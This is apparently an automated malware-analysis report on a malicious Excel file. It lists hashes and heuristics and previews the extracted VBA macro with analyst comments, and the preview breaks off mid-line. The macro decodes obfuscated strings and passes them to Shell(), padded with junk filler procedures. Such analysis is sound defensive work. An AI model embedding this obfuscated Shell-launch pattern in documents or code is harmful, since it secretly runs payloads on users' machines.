Xls.Malware.Stratos-7506050-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 0883082fdeae9373…

MALICIOUS

Office (OLE)

162.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2019-12-10
MD5: f0b44be9d0f4c4bd3539772c5d255a62 SHA-1: af559f3e603d6bcb54e4d00c4580d45330644bc6 SHA-256: 0883082fdeae93734c4838cb0f740a7121d8d6fdc28b4a21dc088feac46ec7a4
140 Risk Score

Malware Insights

Xls.Malware.Stratos-7506050-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1203 Exploitation for Client Execution

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. The script constructs the string passed to Shell() by concatenating two values that a helper function (SdlyldDd5) decodes at run time, so the resulting path does not appear in plain text in the macro source; it is likely used to download and execute a secondary payload. The ClamAV detection name 'Xls.Malware.Stratos-7506050-0' further supports the malicious nature of this Excel file.

Heuristics 3

  • ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 57552 bytes
SHA-256: 2bec83d846e0c743226c896070dc6b9e33f20c65f04ad5021698429f3d8ff22c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Analyst note: this is the only procedure in the preview that does real work.
' It decodes two obfuscated strings, joins them, and hands the result to Shell(),
' which starts an external process. This is the call behind the OLE_VBA_SHELL finding.
' No auto-run hook (e.g. a workbook-open handler) or caller of ivs is visible in
' this preview; the trigger is presumably elsewhere in the document. TODO confirm.
Sub ivs()

' ri is not declared anywhere in view, so it is presumably an implicit Variant.
' SdlyldDd5 is not defined in the visible preview; from its use here it takes an
' encoded string plus a short second argument that looks like a key and returns
' the decoded text. Recover the clear text by reading the helper's body, not by
' running the macro.
ri = SdlyldDd5("u{p|i(p||xBddr6uxd", "8")

' The second fragment is decoded with a different second argument ("4"), so the
' complete command line never exists as a single literal in the source.
' Shell() is called without a window-style argument and its return value is discarded.
Shell (ri + SdlyldDd5("ehvm\whm", "4"))

End Sub
' Analyst note: filler function. It declares one local, assigns it a constant and
' exits without ever assigning a return value. It has no visible side effects and
' no caller in this preview; presumably padding to dilute the macro body.
Public Function OexQkfTzIJHM()
Dim poEIKCcrjT As Long
' String literal is implicitly coerced to Long; the value is never read afterwards.
poEIKCcrjT = "8265"

End Function
' Analyst note: filler function. It assigns constants to two locals and exits
' without setting a return value. Nothing outside the procedure is touched and no
' caller is visible in this preview; presumably junk code added by an obfuscator.
Public Function BFTeyMzmMjiKrJvzZzKE()
Dim poEIKCcrjT As Long
' String literal is implicitly coerced to Long; never read afterwards.
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
' Same pattern with a Currency local; the value is unused.
ldZlBQmajGBfhNinvl = "3079"

End Function
' Analyst note: filler procedure. It assigns constants to three locals and
' returns. There is no I/O, no call to other code and no caller visible in this
' preview; presumably junk code added by an obfuscator.
Private Sub YdAHOtFEUZ()
Dim poEIKCcrjT As Long
' Each assignment below coerces a numeric string into the declared type; none of
' the values is read again.
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"

End Sub
' Analyst note: filler procedure. It makes three unused local assignments and one
' conditional that can never fire. No caller is visible in this preview;
' presumably junk code added by an obfuscator.
Private Sub PpPbUnQtdntpBSh()
Dim poEIKCcrjT As Long
' Numeric strings are coerced into the declared types; the values are never read.
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
' Compares two different string literals, so the condition is always False and
' the End statement (which would halt all VBA execution) is unreachable.
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End

End Sub
' Analyst note: filler procedure. It makes three unused local assignments and two
' conditionals that can never fire. No caller is visible in this preview;
' presumably junk code added by an obfuscator.
Private Sub mxgfSSuCOrKqNgsgeYqn()
Dim poEIKCcrjT As Long
' Numeric strings are coerced into the declared types; the values are never read.
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
' Both tests compare two different string literals, so each is always False and
' neither End statement is reachable.
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End

End Sub
' Analyst note: filler procedure. It contains unused local assignments, two
' always-False conditionals and a jump to the very next line. It has no effect
' outside its own locals and no caller is visible in this preview; presumably
' junk code added by an obfuscator.
Private Sub SDynHypDNwvjU()
Dim poEIKCcrjT As Long
' Numeric strings are coerced into the declared types; the values are never read.
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
' Different literals on each side: always False, so End is unreachable.
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End
' The GoTo targets the label on the following line, so control flow is unchanged.
GoTo bsfjIwuoGDawUb
bsfjIwuoGDawUb:

End Sub
' Analyst note: filler procedure. It contains unused local assignments, two
' always-False conditionals and two jumps that each land on the next line. It has
' no effect outside its own locals and no caller is visible in this preview;
' presumably junk code added by an obfuscator.
Public Sub wzNjluEzdsKf()
Dim poEIKCcrjT As Long
' Numeric strings are coerced into the declared types; the values are never read.
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
' Different literals on each side: always False, so End is unreachable.
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End
' Each GoTo targets the label immediately below it, so control flow is unchanged.
GoTo bsfjIwuoGDawUb
bsfjIwuoGDawUb:
GoTo QQVbLELqDCSVZQpExh
QQVbLELqDCSVZQpExh:

End Sub
' Analyst note: filler function. It contains unused local assignments,
' always-False conditionals, no-op jumps and a short DoEvents loop, and it never
' assigns a return value. No caller is visible in this preview; presumably junk
' code added by an obfuscator.
Private Function RmOThrMaNzbxwYFQIM()
Dim poEIKCcrjT As Long
' Numeric strings are coerced into the declared types; the values are never read.
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
' Different literals on each side: always False, so End is unreachable.
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End
' Each GoTo targets the label immediately below it, so control flow is unchanged.
GoTo bsfjIwuoGDawUb
bsfjIwuoGDawUb:
GoTo QQVbLELqDCSVZQpExh
QQVbLELqDCSVZQpExh:
Dim kiEayrnyPeAnxUPtubv As Integer
' Counts from 10 up to 30 (20 passes), calling DoEvents each time. Only the local
' counter changes; the loop yields to the host application and nothing more.
kiEayrnyPeAnxUPtubv = 10
Do While kiEayrnyPeAnxUPtubv < 30
   DoEvents: kiEayrnyPeAnxUPtubv = kiEayrnyPeAnxUPtubv + 1
Loop

End Function
' Analyst note: filler procedure. It contains unused local assignments,
' always-False conditionals, no-op jumps and a short DoEvents loop. Nothing
' outside its locals is modified and no caller is visible in this preview;
' presumably junk code added by an obfuscator.
Private Sub nomrOUcGTS()
Dim poEIKCcrjT As Long
' Numeric strings are coerced into the declared types; the values are never read.
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
' Different literals on each side: always False, so End is unreachable.
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End
' Each GoTo targets the label immediately below it, so control flow is unchanged.
GoTo bsfjIwuoGDawUb
bsfjIwuoGDawUb:
GoTo QQVbLELqDCSVZQpExh
QQVbLELqDCSVZQpExh:
Dim kiEayrnyPeAnxUPtubv As Integer
' Counts from 10 up to 30 (20 passes), calling DoEvents each time; only the local
' counter changes.
kiEayrnyPeAnxUPtubv = 10
Do While kiEayrnyPeAnxUPtubv < 30
   DoEvents: kiEayrnyPeAnxUPtubv = kiEayrnyPeAnxUPtubv + 1
Loop
Dim GUNygiCfkxu As String
' Unused string local; assigned and then discarded when the Sub ends.
GUNygiCfkxu = "9674"

End Sub
' Analyst note: filler procedure. It contains unused local assignments,
' always-False conditionals, no-op jumps and two short DoEvents loops. Nothing
' outside its locals is modified and no caller is visible in this preview;
' presumably junk code added by an obfuscator.
Public Sub PrzMoInLdDepjBkGqB()
Dim poEIKCcrjT As Long
' Numeric strings are coerced into the declared types; the values are never read.
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
' Different literals on each side: always False, so End is unreachable.
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End
' Each GoTo targets the label immediately below it, so control flow is unchanged.
GoTo bsfjIwuoGDawUb
bsfjIwuoGDawUb:
GoTo QQVbLELqDCSVZQpExh
QQVbLELqDCSVZQpExh:
Dim kiEayrnyPeAnxUPtubv As Integer
' Counts from 10 up to 30 (20 passes), calling DoEvents each time; only the local
' counter changes.
kiEayrnyPeAnxUPtubv = 10
Do While kiEayrnyPeAnxUPtubv < 30
   DoEvents: kiEayrnyPeAnxUPtubv = kiEayrnyPeAnxUPtubv + 1
Loop
Dim GUNygiCfkxu As String
' Unused string local.
GUNygiCfkxu = "9674"
Dim vCENlgJLsyR As Integer
' Three passes (3, 4, 5) that only call DoEvents; the loop has no other effect.
For vCENlgJLsyR = 3 To 5
   DoEvents
Next vCENlgJLsyR

End Sub
Public Sub qotflsJkjzpsk()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUy
... (truncated)